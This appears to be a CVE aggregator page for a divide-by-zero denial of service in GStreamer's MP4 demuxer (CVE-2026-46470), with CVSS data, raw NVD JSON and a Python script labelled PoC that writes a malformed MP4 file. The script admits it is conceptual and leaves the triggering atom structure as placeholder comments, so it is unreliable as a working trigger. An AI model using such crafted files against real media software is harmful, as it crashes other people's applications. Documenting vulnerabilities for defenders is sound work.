Security Vulnerability Report
CVE-2026-46470 | CVSS 3.1 base score 4.0 (MEDIUM)

Published: 2026-05-14 18:16:51
Last Modified: 2026-05-14 18:24:09

Description

An issue was discovered in GStreamer gst-plugins-good before 1.28.2. When parsing MP4 audio tracks, the isomp4 plugin's qtdemux_audio_caps function does not sufficiently validate atom data before performing division operations, leading to denial of service due to integer division by zero.

CVSS Details

CVSS Version: 3.1
CVSS Base Score: 4.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Weakness: CWE-369 (Divide By Zero)

Configurations (Affected Products)

No CPE configuration data is available yet (record status: Awaiting Analysis). Affected product per the description:

GStreamer gst-plugins-good < 1.28.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# PoC script to generate a malformed MP4 file triggering the division by zero
# This is a conceptual PoC. The exact atom structure needs to match the vulnerable code path.

def create_poc(filename):
    with open(filename, 'wb') as f:
        # Write minimal MP4 header (ftyp)
        f.write(b'\x00\x00\x00\x20\x66\x74\x79\x70')
        f.write(b'mp42' + b'\x00\x00\x00\x00')
        f.write(b'mp42' + b'\x00\x00\x00\x00')

        # Write a malformed 'moov' atom
        # The vulnerability is in qtdemux_audio_caps, likely within 'stsd' or similar audio description atoms.
        # We inject a zero value where a divisor is expected.
        moov_content = b''
        # ... (construction of specific atoms causing the issue) ...

        # Example malicious atom header (Size = 0x100, Type = 'mdat' or relevant audio atom)
        # The actual payload would contain the zero divisor.
        malicious_atom = struct.pack('>I', 0x100) + b'stsd' + (b'\x00' * 240)
        f.write(malicious_atom)

if __name__ == "__main__":
    create_poc("cve_2026_46470_poc.mp4")

References

https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/11243.patch (fix merge request)
https://gstreamer.freedesktop.org/security/sa-2026-0018.html (GStreamer security advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-46470",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T18:16:50.790",
    "lastModified": "2026-05-14T18:24:08.747",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An issue was discovered in GStreamer gst-plugins-good before 1.28.2. When parsing MP4 audio tracks, the isomp4 plugin's qtdemux_audio_caps function does not sufficiently validate atom data before performing division operations, leading to denial of service due to integer division by zero."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 4.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-369"}
        ]
      }
    ],
    "references": [
      {"url": "https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/11243.patch", "source": "[email protected]"},
      {"url": "https://gstreamer.freedesktop.org/security/sa-2026-0018.html", "source": "[email protected]"}
    ]
  }
}